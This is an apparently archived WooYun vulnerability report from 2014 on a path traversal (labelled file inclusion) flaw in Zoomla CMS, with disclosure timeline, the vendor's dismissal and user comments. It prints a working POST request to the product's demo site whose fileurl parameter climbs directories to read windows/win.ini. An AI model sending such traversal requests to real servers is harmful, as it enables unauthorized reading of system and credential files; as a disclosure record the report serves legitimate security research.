当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048639

漏洞标题:逐浪cms文件包含漏洞

相关厂商:逐浪CMS

漏洞作者: m1x7e1

提交时间:2014-01-12 11:01

修复时间:2014-04-09 11:02

公开时间:2014-04-09 11:02

漏洞类型:文件包含

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-13: 细节向核心白帽子及相关领域专家公开
2014-03-23: 细节向普通白帽子公开
2014-04-02: 细节向实习白帽子公开
2014-04-09: 细节向公众公开

简要描述:

逐浪cms文件包含

详细说明:

Url:http://demo.zoomla.cn/Plugins/Doc.aspx
POST:

btnBill=%e7%94%9f%e6%88%90%e5%90%88%e5%90%8c%e5%88%b0%e4%ba%91%e7%9b%98&Button1=%e6%a0%bc%e5%bc%8f%e9%a2%84%e8%a7%88&fileurl=../../../../../../../../../../windows/win.ini&Mydoc=%e6%88%91%e7%9a%84%e5%90%88%e5%90%8c&selCard=&txtDes=&__VIEWSTATE=/wEPDwUKLTMxMTEyOTYzMQ9kFgICAw9kFgJmDxYCHgtfIUl0ZW1Db3VudAIIFhBmD2QWAmYPFQIBMQzlhazlj7jlkIjlkIxkAgEPZBYCZg8VAgEyDOazleW%2bi%2baWh%2bWHvWQCAg9kFgJmDxUCATMQ6LSt6ZSA5ZCI5ZCMLmRvY2QCAw9kFgJmDxUCATQT5Yqz5Yqo5ZCI5ZCM5LmmLmRvY2QCBA9kFgJmDxUCATUZ6K%2bV55So5ZGY5bel6ICD5qC46KGoLmRvY2QCBQ9kFgJmDxUCATYZ5Zui5L2T5Z%2b56K6t55Sz6K%2b36KGoLmRvY2QCBg9kFgJmDxUCATcW57un5om/5p2D6K%2bB5piO5LmmLmRvY2QCBw9kFgJmDxUCATgc6K%2bJ6K686LSi5Lqn5L%2bd5YWo55Sz6K%2b3LmRvY2RkaEU/PNdxxazElafJNZNrFjYXg8spHysdi8MtZ8%2b7cTQ%3d


wenjian.jpg

漏洞证明:

wenjian.jpg

修复方案:

版权声明:转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-09 11:02

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-12 15:20 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    ASP.NET还有文件包含的说法?文件下载而已吧。

  2. 2014-01-15 23:51 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    马上要16号了,估计17号他们也不会来的,他们会叫杨先生帮忙修复……洞主可能也会变成杨先生啊

  3. 2014-02-04 00:33 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    果然不算文件包含……

  4. 2014-04-09 11:34 | dave ( 实习白帽子 | Rank:73 漏洞数:12 | ส้้้้้้้้้้้้้้้้้้้...)

    @m1x7e1 楼主 你的chrome 插件叫啥名字啊。。